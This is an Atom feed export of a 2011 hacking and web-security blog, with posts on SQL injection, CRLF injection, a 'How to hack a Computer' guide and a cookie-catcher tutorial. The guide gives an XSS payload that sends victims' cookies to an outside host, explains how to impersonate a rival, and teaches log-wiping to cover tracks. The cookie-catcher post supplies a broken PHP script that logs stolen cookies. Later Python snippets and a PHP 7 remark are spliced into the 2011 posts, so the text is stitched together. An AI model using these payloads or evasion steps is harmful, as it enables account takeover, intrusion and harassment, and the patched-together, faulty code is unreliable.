&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
As you can see, the open_basedir solution is easier, but creating a whitelist using a switch or if statements is more effective. You could also use regular expressions to check for directory traversal, but this can typically be bypassed fairly easily, which is why it's not given as a solution.&lt;br /&gt;
&lt;br /&gt;
0x05 - SQL Injection&lt;br /&gt;
As said during the XSS section, magic_quotes_gpc was created to help  prevent sql attacks as well as the addslashes() function. Another  function geared towards protecting the site's database is  mysql_real_escape_string(). mysql_real_escape_string escapes special  characters such as \x00,\n,\r,\,'," and \x1a; so the developer could  create a query that is vulnerable:&lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&lt;br /&gt;
$id = $_GET['id'];&lt;br /&gt;
$query = "SELECT * FROM products WHERE id = $id";&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
this can be secured with the previous function&lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&lt;br /&gt;
$id = mysql_real_escape_string($_GET['id']);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
If your user input variable is supposed to only be a number, like the previous example, you could also use is_numeric(), which obviously checks whether the variable is a number.&lt;br /&gt;
&lt;div class="code_bbcode"&gt;&lt;div class="tbl-border tbl2" style="width: 550px;"&gt;&lt;strong&gt;Code&lt;/strong&gt;&lt;/div&gt;&lt;div class="tbl-border tbl1" style="overflow: auto; white-space: nowrap; width: 550px;"&gt;&lt;code style="white-space: nowrap;"&gt;&lt;br /&gt;
$id = $_GET['id'];&lt;br /&gt;
if(is_numeric($id))&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp; &amp;nbsp;$query = \"SELECT * FROM products WHERE id = $id\";&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
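The escaped query above still places $id in an unquoted numeric position, where an input such as 0 OR 1=1 contains nothing for mysql_real_escape_string() to escape. The following added example is not from the original post: it uses Python with an in-memory sqlite3 table standing in for PHP and MySQL, and escape_quotes() is a hypothetical, simplified stand-in for the escaping function. It compares that pattern with a bound parameter and a strict digit check.

```python
"""Added example: quote-escaping versus bound parameters for the numeric
id query shown above (sqlite3 stands in for MySQL so it runs offline)."""
import re
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    """In-memory products table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [(1, "kettle"), (2, "toaster"), (3, "blender")],
    )
    return db


def escape_quotes(value: str) -> str:
    """Simplified stand-in for mysql_real_escape_string(): put a backslash
    in front of the characters the post lists. Illustration only."""
    out = []
    for ch in value:
        if ch in "\x00\n\r\\'\"\x1a":
            out.append("\\")
        out.append(ch)
    return "".join(out)


def lookup_escaped(db: sqlite3.Connection, raw_id: str) -> List[str]:
    """The post's pattern: escaped value in an UNQUOTED numeric slot.
    Input without quote characters passes through the escaper unchanged
    and is parsed as SQL."""
    query = "SELECT name FROM products WHERE id = " + escape_quotes(raw_id)
    return [row[0] for row in db.execute(query)]


def lookup_bound(db: sqlite3.Connection, raw_id: str) -> List[str]:
    """Bound parameter: the value travels as data and is never parsed."""
    cur = db.execute("SELECT name FROM products WHERE id = ?", (raw_id,))
    return [row[0] for row in cur]


def parse_id(raw_id: str) -> Optional[int]:
    """Strict allowlist for a numeric id: 1 to 9 ASCII digits, nothing else.
    Tighter than PHP's is_numeric(), which also accepts forms like 1e3."""
    if re.fullmatch(r"[0-9]{1,9}", raw_id):
        return int(raw_id)
    return None


if __name__ == "__main__":
    db = make_db()
    hostile = "0 OR 1=1"  # constructed input: no quotes, nothing to escape
    print("escaped, unquoted:", lookup_escaped(db, hostile))
    print("bound parameter  :", lookup_bound(db, hostile))
    print("strict digit test:", parse_id(hostile))
```

In PHP the equivalent of lookup_bound() is a prepared statement through PDO or mysqli, with the id bound rather than interpolated into the query string.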
0x06 - Cross-Site Request Forgery (CSRF)&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=78RI69ViQQY:eJZS-_mWaeI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=78RI69ViQQY:eJZS-_mWaeI:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=78RI69ViQQY:eJZS-_mWaeI:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=78RI69ViQQY:eJZS-_mWaeI:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=78RI69ViQQY:eJZS-_mWaeI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/6330847629404940258/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/saving-world-one-vulnerability-at-time.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/6330847629404940258?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/6330847629404940258?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/saving-world-one-vulnerability-at-time.html" title="Saving the World, One Vulnerability at a Time" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEcCRH86eip7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-7825686487686365832</id><published>2011-09-10T23:04:00.000+05:30</published><updated>2011-09-10T23:04:25.112+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:04:25.112+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="system hacking" /><title>How to hack a Computer</title><content type="html">*****How to Hack a Computer*****&lt;br /&gt;
Table of Contents&lt;br /&gt;
&lt;br /&gt;
Chapter 1: Preparation.&lt;br /&gt;
&lt;br /&gt;
Chapter 2: Analysis.&lt;br /&gt;
&lt;br /&gt;
Chapter 3: Testing for a vulnerability.&lt;br /&gt;
&lt;br /&gt;
Chapter 4: Exploitation of said vulnerability.&lt;br /&gt;
&lt;br /&gt;
Chapter 5: Covering your tracks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disclaimer: I, Stormc1nd3r, take NO RESPONSIBILITY whatsoever for what you do with&lt;br /&gt;
the information that is written in this guide, which was written for general matters of interest &amp;amp; legitimate use ONLY!&lt;br /&gt;
&lt;br /&gt;
Preface: This guide assumes you know the basics, e.g. Javascript injections, XSS&lt;br /&gt;
cookie exploitation, directory navigation, etc, but need a way to put it all together.&lt;br /&gt;
&lt;br /&gt;
Feel free to post this guide wherever, but please leave a link to HvS/SO. &lt;a href="http://www.securityoverride.com/" target="_blank" title="autolink"&gt;www.securityoverride.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Chapter 1: Preparation.&lt;br /&gt;
&lt;br /&gt;
First, you need software. All the software listed can be found with a simple Google search.&lt;br /&gt;
&lt;br /&gt;
Cain &amp;amp; Abel&lt;br /&gt;
Putty&lt;br /&gt;
Nmap&lt;br /&gt;
Firefox (Firefox add-ons are listed in { }.)&lt;br /&gt;
{Add N Edit Cookies&lt;br /&gt;
Firebug&lt;br /&gt;
Live HTTP headers&lt;br /&gt;
NoScript&lt;br /&gt;
SQL Injections&lt;br /&gt;
Tamper Data&lt;br /&gt;
URLParams&lt;br /&gt;
User Agent Switcher&lt;br /&gt;
Web Developer}&lt;br /&gt;
Net Tools&lt;br /&gt;
Wireshark&lt;br /&gt;
TOR&lt;br /&gt;
XeroBank Browser&lt;br /&gt;
Perl&lt;br /&gt;
Python&lt;br /&gt;
PHP&lt;br /&gt;
&lt;br /&gt;
If you need more general hacking skills, check out the HvS challenges, as well as w3schools.com.&lt;br /&gt;
&lt;br /&gt;
Chapter 2: Analysis.&lt;br /&gt;
&lt;br /&gt;
All good hacking begins with analysis. Start by doing a scan on your target using Nmap.&lt;br /&gt;
Take note of all the information you get; it will be useful. The ports it runs &amp;amp; the OS it uses will be useful when searching for vulnerabilities on the system.&lt;br /&gt;
Next, decide what port you want to attack, but make sure you know how the protocol that the port runs works. Once you've connected, try to learn all you can about &lt;br /&gt;
the system. Usually the server will tell you what software is used to run it; look it up on Milw0rm.com. Try using the "help" command once connected. Check the page source for&lt;br /&gt;
forms, directories, and clues as to what software the server uses.&lt;br /&gt;
For example, a server might use Perl; you could tell because you would see files or directories&lt;br /&gt;
that end in .pl. Make sure to write down EVERY clue you get: what computer languages the server uses, what version of Apache, etc. (Try going to &lt;a href="http://www.example.com/images" target="_blank" title="autolink"&gt;www.example.com/images&lt;/a&gt;; usually at the bottom&lt;br /&gt;
of the page it will tell you what version of Apache it runs.) As stated before, visiting the server on different ports is a good &amp;amp; fast way to pick up clues. If the server has an open FTP server (port 21),&lt;br /&gt;
try logging in as anonymous without entering anything as a password. If you get in, visit the directory /etc and the sub-directories /group/ and /passwd/ for information on the users on the server.&lt;br /&gt;
Make sure to try every port on the site, even if it doesn't seem important. If you connect to the port, it will usually tell you what software it's running; this can often be exploited with a simple Milw0rm.com search. Also, be careful!&lt;br /&gt;
Sites often leave honeypots (bait). For example: you connect to a server on port 25 (SMTP), you use the "help" command to see what commands the server allows, you see that the server allows the "debug" command, which you know can often be exploited, so you run the command, and get kicked off the server,&lt;br /&gt;
and get IP banned.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Chapter 3: Testing for an exploit.&lt;br /&gt;
&lt;br /&gt;
Once you have found a good clue which you think will be useful in hacking into the server, you should generally test it out before searching around more. Here's an attack scenario: Tom's rival, Huck, recently made an account on an online social networking site. Tom wants to log in as Huck, and send rude PMs to Huck's friends.&lt;br /&gt;
He then goes over the server with a proverbial fine-toothed comb. He notices that there's a form that is used to send other users messages. Tom decides to check to see&lt;br /&gt;
if the form is vulnerable to XSS attacks. To test it out, he sends himself a message with a basic script in it. The script reads: alert("BOO!").&lt;br /&gt;
When he opens the message, a Javascript alert reading "BOO!" pops up. Tom now knows that it IS indeed vulnerable to XSS attacks. He sends Huck a message with the following script in it: document.location="http://bla.com/cookie.php?c=" + document.cookie&lt;br /&gt;
When Huck opens the message, it sends him to a location on Tom's server which contains a PHP script, which steals Huck's cookies, and redirects Huck to a different site. Tom uses &lt;br /&gt;
Javascript to change his cookies to match Huck's, which effectively logs him in AS Huck. He then sends hateful messages to Huck's friends, strongly damaging his personal life. This is only a basic example, but it&lt;br /&gt;
shows how critical research is. Here's another example, in which a tiny sliver of information leads to the downfall of the server: you find out that the server you want&lt;br /&gt;
destroyed, defaced, pillaged, haxxored, or otherwise illegally abused, uses Apache 1.2.3. You go to Milw0rm.com and search "Apache 1.2.3". You find an article containing how to exploit that version of Apache&lt;br /&gt;
to login as an administrator. You launch the exploit &amp;amp; get in. See the difference made by the tiny shard of information?&lt;br /&gt;
Basically, if you find something interesting on a site, be it possibly exploitable software, a shoutbox, or a possibly XSS vulnerable form, you need to do research on it to see if it can be used for your own benefit. Sometimes you can test this yourself, like in the above example,&lt;br /&gt;
but often you won't know how to exploit what the server is running (say your clue is subtle, like the version of Apache the server runs). You can try a Google search,&lt;br /&gt;
like say "Apache 1.1.12 exploit". Or you can try searching on a security-based site like securityfocus.com or Milw0rm.com.&lt;br /&gt;
&lt;br /&gt;
List of items to check for on every server.&lt;br /&gt;
- Ports.&lt;br /&gt;
- Source of all critical looking pages, if site is small, then every page.&lt;br /&gt;
- Check the cookies at different times on the site: while logged in, while logged out, etc.&lt;br /&gt;
- Check the headers of the important pages on the site.&lt;br /&gt;
- If you find a directory list, be sure to look around well, and try default password directories.&lt;br /&gt;
- Try searching a feature you find on the site on Milw0rm. For example,  if the site uses PHP, look for PHP exploits. (This goes for other  languages too.)&lt;br /&gt;
- Try typing the website url into your browser, but instead of http:// use ftp://. If asked for a username &amp;amp; password, use this: Username: anonymous Password:&lt;br /&gt;
&lt;br /&gt;
Chapter 4: Exploiting the vulnerability.&lt;br /&gt;
&lt;br /&gt;
This is going to be a short chapter, since the actual exploitation is pretty straightforward&lt;br /&gt;
once you've found the vulnerability. Just use the attack you researched on the site, and be quick about it.&lt;br /&gt;
Make your plans for what you'll do when you've exploited the vulnerability before you break in.&lt;br /&gt;
&lt;br /&gt;
Chapter 5: Covering your tracks.&lt;br /&gt;
&lt;br /&gt;
There are many ways to avoid getting caught. Even if you have permission, &lt;br /&gt;
you might want to do this just to prove that you know what you're doing. If you're a student, you might be required to do this to pass. Generally, the&lt;br /&gt;
best way to cover your tracks is never to have left them. Download XeroBank, http://xerobank.com/, (Firefox with built-in TOR),&lt;br /&gt;
or use a web based proxy. If you choose the latter, I recommend hvs.php-invent.com/prox. The user is hvs, the pass is proxy.&lt;br /&gt;
But if you DID leave tracks, then look around the server for logs. If you gained admin privileges it should&lt;br /&gt;
be no problem to clear them. URL Params for Firefox is a useful tool for log clearing. If you find a "clear logs" button, but it doesn't work, check your cookies for something&lt;br /&gt;
along the lines of "authorized" or "admin" and change the value to 1.  You can also try injecting the logs command with Javascript, or trick  someone who can into doing it.
</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/7825686487686365832/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/how-to-hack-computer.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7825686487686365832?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7825686487686365832?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/how-to-hack-computer.html" title="How to hack a Computer" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;D04ARHw7eSp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-8521055675894893347</id><published>2011-09-10T23:02:00.001+05:30</published><updated>2011-09-10T23:02:25.201+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:02:25.201+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web security" /><title>CRLF Injections</title><content type="html">----------------------------------------&lt;br /&gt;
[0x] Table of Contents&lt;br /&gt;
----------------------------------------&lt;br /&gt;
&lt;br /&gt;
[1x] - What is a CRLF Injection?&lt;br /&gt;
[2a] - Vulnerability PoC - Comment System&lt;br /&gt;
[2b] - Vulnerability PoC - Email Form&lt;br /&gt;
[2c] - Vulnerability PoC - Header Injection&lt;br /&gt;
[3x] - Patching&lt;br /&gt;
[4x] - References&lt;br /&gt;
[5x] - Conclusion&lt;br /&gt;
&lt;br /&gt;
----------------------------------------&lt;br /&gt;
[1x] What is a CRLF Injection?&lt;br /&gt;
----------------------------------------&lt;br /&gt;
&lt;br /&gt;
Carriage Return Line Feed (CRLF) injections work due to improper sanitization of user input. The carriage&lt;br /&gt;
return is essentially the same as hitting 'Enter' or 'Return', creating a new line. The&lt;br /&gt;
carriage return can be represented in a few different ways: CR, ASCII 13 or \r. Both the carriage&lt;br /&gt;
return and the line feed do essentially the same thing, although the line feed is represented as&lt;br /&gt;
LF, ASCII 10 or \n. These commands are printer commands: the line feed tells the printer to feed&lt;br /&gt;
out one line and a carriage return tells the printer carriage to go to the beginning of the current&lt;br /&gt;
line. In the event you know the operating system of the target machine it will prove useful to know&lt;br /&gt;
that Windows uses CR/LF but *nix systems only use LF.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----------------------------------------&lt;br /&gt;
[2a] Vulnerability PoC - Comment System&lt;br /&gt;
----------------------------------------&lt;br /&gt;
&lt;br /&gt;
To illustrate the first method of CRLF we will be using a hypothetical comment application which is&lt;br /&gt;
vulnerable to the attack. Let's say our current comment system looks like so:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
8/04/07 - Dave Something is wrong with the login system?&lt;br /&gt;
09/04/07 - haZed Yeah, you should fix it....&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Keep in mind both of these posts are legitimate. To exploit the vulnerability our attacker will craft&lt;br /&gt;
a post that will make it seem like he's posting as an administrator. He will enter the following&lt;br /&gt;
into the comment box:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Yep, doesn't work..\n10/04/07/ - Admin I've relocated the login to &lt;a href="http://attackersite.com/login.php" target="_blank" title="autolink"&gt;http://attackersite.com/login.php&lt;/a&gt;,&lt;br /&gt;
you should be able to login there.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This extremely simple injection will change the comment output to the following result.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
8/04/07 - Dave Something is wrong with the login system?&lt;br /&gt;
09/04/07 - haZed Yeah, you should fix it....&lt;br /&gt;
09/04/07 - Ethernet Yep, doesn't work..&lt;br /&gt;
10/04/07 - Admin I've relocated the login to &lt;a href="http://attackersite.com/login.php" target="_blank" title="autolink"&gt;http://attackersite.com/login.php&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As you can clearly see in the example, by posing as an administrator we are able to phish passwords&lt;br /&gt;
from the unsuspecting users. By inserting our new line character into the post we can go down a line&lt;br /&gt;
and pretend to be an administrator. It's a pretty neat trick.&lt;br /&gt;
&lt;br /&gt;
----------------------------------------&lt;br /&gt;
[2b] Vulnerability PoC - Email Form&lt;br /&gt;
----------------------------------------&lt;br /&gt;
&lt;br /&gt;
The second and final example involves a script used to send emails to other users. The catch is that&lt;br /&gt;
you cannot see the real email address of the person you are sending to. To exploit this we can simply&lt;br /&gt;
insert the following into the 'Subject' header:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Hey, it's Dave\nBcc: &lt;a href="mailto:dave@email.com"&gt;dave@email.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This injection will send the email over to &lt;a href="mailto:dave@email.com"&gt;dave@email.com&lt;/a&gt; AND the person we originally specified in the&lt;br /&gt;
'To' column. These mail forms can also be exploited by spammers in order to hide their identity. By&lt;br /&gt;
using a similar method as above they can 'Cc' and 'Bcc' the message to 100's of other people, spamming their&lt;br /&gt;
inboxes anonymously.&lt;br /&gt;
&lt;br /&gt;
----------------------------------------&lt;br /&gt;
[2c] Vulnerability PoC - Header Injection&lt;br /&gt;
----------------------------------------&lt;br /&gt;
&lt;br /&gt;
As an alternative to inserting the carriage return/line feed into an input box we can also use a program like&lt;br /&gt;
Achilles to intercept the POST headers and then modify them. Using an example similar to the Email Form&lt;br /&gt;
example above we could change our headers like so:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 147&lt;br /&gt;
&lt;br /&gt;
name=This+is+a+test+&amp;amp;email=dave@coldmail.com&amp;amp;subject=Test&amp;amp;header=Header:&lt;br /&gt;
noone@thingy.com&lt;br /&gt;
CC:fbi.gov@meow.com&lt;br /&gt;
Bcc:enigmagroup.test.@eg.com,&lt;br /&gt;
psychomarine@enigmagroup.org,&lt;br /&gt;
ausome1@enigmagroup.org&lt;br /&gt;
&amp;amp;msg=crlf!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As you can plainly see in the above example we are able to modify the header in order to spam those email&lt;br /&gt;
addresses.&lt;br /&gt;
&lt;br /&gt;
----------------------------------------&lt;br /&gt;
[3x] Patching&lt;br /&gt;
----------------------------------------&lt;br /&gt;
&lt;br /&gt;
The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to&lt;br /&gt;
$_POST['input'].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// preg_match() is used here because eregi() was removed in PHP 7&lt;br /&gt;
if (preg_match('/[\r\n]/', $_POST['input'])) //This checks for a carriage return or new line character in the POST variable&lt;br /&gt;
{ //start if..&lt;br /&gt;
die("CRLF Attack Detected"); //exit program if CR or LF is found in the variable&lt;br /&gt;
} //end if..&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I have commented the code so that you can gain an idea of how we are fixing this vulnerability. As you can see&lt;br /&gt;
it doesn't take much to thwart this vulnerability. Sadly, not many people are implementing such a patch.&lt;br /&gt;
&lt;br /&gt;
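The same check applied at the two sinks from [2a] and [2b], as an added example in Python (not the article's PHP and not the author's code). It goes slightly beyond the patch by treating a bare CR and the other separators Python's splitlines() honours as line breaks, and it pairs each vulnerable form with a hardened one. The "date - author: text" record layout, the function names and all sample values are assumptions made for the example.&lt;br /&gt;

```python
# Added example, not the article's code. The record layout "date - author: text"
# and every sample value below are constructed for illustration.
import re
from email import message_from_string

# Characters that line-oriented parsers treat as "end of line": CR and LF,
# plus the extra separators that Python's str.splitlines() also honours.
LINE_BREAKS = re.compile("[\r\n\x0b\x0c\x1c\x1d\x1e\x85\u2028\u2029]")


def naive_comment(date, author, text):
    """Vulnerable form: user text is written to the line-based store as-is."""
    return "%s - %s: %s\n" % (date, author, text)


def safe_comment(date, author, text):
    """Hardened form: reject breaks in the author, make them visible in the text."""
    if LINE_BREAKS.search(author):
        raise ValueError("line break in author name")
    # Each break becomes the two visible characters backslash + n, so the
    # submission stays on one record line and the attempt remains readable.
    flat = LINE_BREAKS.sub(lambda _m: "\\n", text)
    return "%s - %s: %s\n" % (date, author, flat)


def records(log):
    """Records as a reader of the store sees them: one per line."""
    return log.splitlines()


def naive_mail(to, subject, body):
    """Vulnerable form: header values are concatenated into the message."""
    return "To: %s\r\nSubject: %s\r\n\r\n%s" % (to, subject, body)


def checked_header(name, value):
    """Refuse any header value that could start a new header line."""
    if LINE_BREAKS.search(value):
        raise ValueError("line break in %s header" % name)
    return value


def safe_mail(to, subject, body):
    """Hardened form: validate each header value; the body may span lines."""
    return naive_mail(checked_header("To", to),
                      checked_header("Subject", subject), body)


def header_names(raw):
    """Header names a standard mail parser extracts from a raw message."""
    return [name for name, _value in message_from_string(raw).items()]


if __name__ == "__main__":
    forged = "Yep, doesn't work..\n10/04/07 - Admin: login has moved"
    print(records(naive_comment("09/04/07", "Ethernet", forged)))
    print(records(safe_comment("09/04/07", "Ethernet", forged)))
    subject = "Hey, it's Dave\nBcc: dave@example.test"
    print(header_names(naive_mail("user@example.test", subject, "hello")))
```

Rejecting the header value outright, rather than stripping the break, keeps the attempt out of the mail queue and leaves the decision to log it with the caller.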
----------------------------------------&lt;br /&gt;
[4x] References&lt;br /&gt;
----------------------------------------&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://ca.php.net/manual/en/function.eregi.php" target="_blank" title="autolink"&gt;http://ca.php.net/manual/en/function.eregi.php&lt;/a&gt; - PHP Eregi function used in patch&lt;br /&gt;
&lt;a href="http://en.wikipedia.org/wiki/CRLF" target="_blank" title="autolink"&gt;http://en.wikipedia.org/wiki/CRLF&lt;/a&gt; - General CRLF information&lt;br /&gt;
&lt;a href="http://www.owasp.org/index.php/CRLF_Injection" target="_blank" title="autolink"&gt;http://www.owasp.org/index.php/CRLF_Injection&lt;/a&gt; - OWASP CRLF stub article&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3749417081738719676-8521055675894893347?l=jaguargeek.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=VvE-R5pAi_k:kzc9-a1EfQ8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=VvE-R5pAi_k:kzc9-a1EfQ8:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?i=VvE-R5pAi_k:kzc9-a1EfQ8:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=VvE-R5pAi_k:kzc9-a1EfQ8:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/jaguargeek?a=VvE-R5pAi_k:kzc9-a1EfQ8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/jaguargeek?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/8521055675894893347/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/crlf-injections.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/8521055675894893347?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/8521055675894893347?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/crlf-injections.html" title="CRLF Injections" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;D0AGSXo-fyp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-17416869103963400</id><published>2011-09-10T22:58:00.000+05:30</published><updated>2011-09-10T22:58:48.457+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T22:58:48.457+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web security" /><title>Cookie Catcher</title><content type="html">This article will teach you how to make a cookie catcher.&lt;br /&gt;
&lt;br /&gt;
What is a cookie?&lt;br /&gt;
&lt;br /&gt;
A cookie is a special thing used to store information in a web browser such as user logins, passwords, etc.&lt;br /&gt;
&lt;br /&gt;
What is a cookie catcher?&lt;br /&gt;
&lt;br /&gt;
A cookie catcher is a php script which captures a browser's cookies.&lt;br /&gt;
&lt;br /&gt;
Is making a cookie catcher hard?&lt;br /&gt;
&lt;br /&gt;
Not at all. The hard part is getting someone to click on a link which contains the cookie catcher.&lt;br /&gt;
&lt;br /&gt;
Creating The Cookie Catcher:&lt;br /&gt;
&lt;br /&gt;
Now we are going to get down to the cookie catcher.&lt;br /&gt;
&lt;br /&gt;
First you need a webserver that supports php.&lt;br /&gt;
&lt;br /&gt;
Now that you have that we can begin.&lt;br /&gt;
&lt;br /&gt;
Here is the cookie catcher:&lt;br /&gt;
&lt;br /&gt;
Code&lt;br /&gt;
&lt;br /&gt;
$cookie = $_GET['cookie'];&lt;br /&gt;
$ip = $_SERVER['REMOTE_ADDR'];&lt;br /&gt;
$date=date(“j F, Y, g:i a”);;&lt;br /&gt;
$refere$_SERVER['HTTP_REFERER'];&lt;br /&gt;
$fp = fopen('cookies.html', 'a');&lt;br /&gt;
fwrite($fp, 'Cookie: '.$cookie.'&lt;br /&gt;
IP: ' .$ip. '&lt;br /&gt;
Date and Time: ' .$date. '&lt;br /&gt;
Website: '.$referer.'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
');&lt;br /&gt;
fclose($fp);&lt;br /&gt;
header (\"javascript:history.back()\");&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
